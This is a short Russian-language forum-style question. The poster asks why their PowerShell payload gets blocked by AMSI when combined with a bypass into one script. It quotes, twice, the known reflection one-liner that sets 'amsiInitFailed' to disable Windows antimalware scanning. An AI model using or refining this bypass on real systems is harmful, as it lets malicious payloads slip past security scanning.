Я тестирую свой пауэршелл пэйлоад и байпасс для амси.Когда я сначала выполняю байпасс,а потом пэйлоад то все работает.Когда я объеденяю все в один скрипт ,амси его блочит.В качестве байпасса исполльзую
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true).В чем проблема ?
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true).В чем проблема ?
